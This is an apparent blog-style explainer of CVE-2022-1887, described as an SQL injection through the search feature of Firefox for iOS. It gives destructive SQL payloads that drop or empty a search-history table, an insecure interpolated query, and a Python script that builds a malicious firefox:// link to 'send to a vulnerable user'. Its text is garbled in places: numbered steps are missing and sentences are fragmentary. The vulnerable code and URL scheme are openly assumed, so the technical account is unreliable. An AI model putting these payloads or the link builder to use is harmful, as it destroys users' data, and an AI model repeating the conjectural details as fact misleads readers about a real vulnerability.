In 2022, security researchers discovered a dangerous vulnerability in Firefox for iOS (versions prior to 101) that let attackers exploit search input to perform SQL injection—a technique that could let a hacker take control of your local data. Sounds wild? Let’s break down CVE-2022-1887 in simple terms, see how it happens, and why you should care.

What Is CVE-2022-1887?

CVE-2022-1887 is a security flaw found in Mozilla's Firefox for iOS – specifically in versions before 101. The bug allowed outside attackers to "inject" malicious SQL code via the search function, making it possible to manipulate the SQLite database used by the browser.

Type: SQL Injection

- CVE Link: NVD - CVE-2022-1887
- Mozilla Advisory: MFSA 2022-23 #CVE-2022-1887

How Did the Bug Work?

The search feature in Firefox for iOS stored and queried recent searches using an embedded SQLite database. Normally, if you enter a search like “cat videos”, the app will securely insert that into the database.

But *before version 101*, Firefox did not sufficiently sanitize the search term. If an attacker crafted a search term containing SQL code, and somehow forced the app to process it (for example, via a crafted URL or link to an internal browser protocol), they could execute arbitrary SQL commands.

Let’s go step-by-step through a simplified attack scenario

1. Attacker crafts a search term: Instead of searching "cat videos", the attacker uses something like "dogs'); DROP TABLE searchHistory; --" (an infamous classic for those who know SQL injection).

Browser receives search term and blindly inserts it into an SQL query.

4. Injected SQL executes: Instead of just searching, Firefox deletes the user's search history table!

Suppose Firefox for iOS used a snippet like this (in Swift with SQLite)

let searchTerm = userInputTextField.text! // Assume unsanitized input

// This is insecure: user input is inserted directly into the query string!
let query = "SELECT * FROM searchHistory WHERE term = '\(searchTerm)'"
let result = db.execute(query)

If a user input of  
dogs'); DROP TABLE searchHistory; --

were supplied, it would translate to

SELECT * FROM searchHistory WHERE term = 'dogs'); DROP TABLE searchHistory; --'


The injected payload closes the string, ends the statement, and executes a command to drop (delete) the search history table!

Here’s what an attacker could use as the malicious search term

a'; DELETE FROM searchHistory WHERE 1=1; --

If no input validation is in place, this would wipe out all search history entries.

Exploit Script Example (for Testing)

Important: _This is for educational testing only, do not use on live devices!_

# Exploit for demonstration—send a custom search term via iOS URL scheme
import urllib.parse

# Malicious payload
payload = "a'; DELETE FROM searchHistory WHERE 1=1; --"

# Encode payload for URL
encoded = urllib.parse.quote(payload)

# Make a Firefox iOS search URL (assume it registers a URL protocol like firefox://search?q=)
exploit_url = f"firefox://search?q={encoded}"

print("Send this URL to a vulnerable user:")
print(exploit_url)

If a victim opens this link and their or app does not sanitize input, their search database will be tampered with.

How Was It Fixed?

Mozilla patched this issue in Firefox for iOS 101, ensuring:
- Search terms are sanitized/escaped before being sent to the SQL engine.

- Parameterized queries are used, like so

let query = "SELECT * FROM searchHistory WHERE term = ?"
let result = db.execute(query, [searchTerm])


This method safely binds the parameter so SQL code can no longer sneak in.

Data privacy: Attackers could steal or delete your local data.

- App stability: SQL injection could corrupt your browser’s database, causing crashes or loss of data.

Update Firefox for iOS: Make sure your app is 101 or later.

- Be wary of strange links: Don’t open weird links in apps, especially those that prompt in-app searches.

References

- NVD Advisory: CVE-2022-1887
- Mozilla Foundation Security Advisory 2022-23 #CVE-2022-1887
- OWASP: SQL Injection
- Firefox for iOS Release 101 Notes

Final Word

CVE-2022-1887 is a classic example that even mobile browsers can have web-style vulnerabilities. Keeping your software up to date—and your code clean—is always your best defense. Stay safe!

Timeline

Published on: 12/22/2022 20:15:00 UTC
Last modified on: 12/24/2022 04:23:00 UTC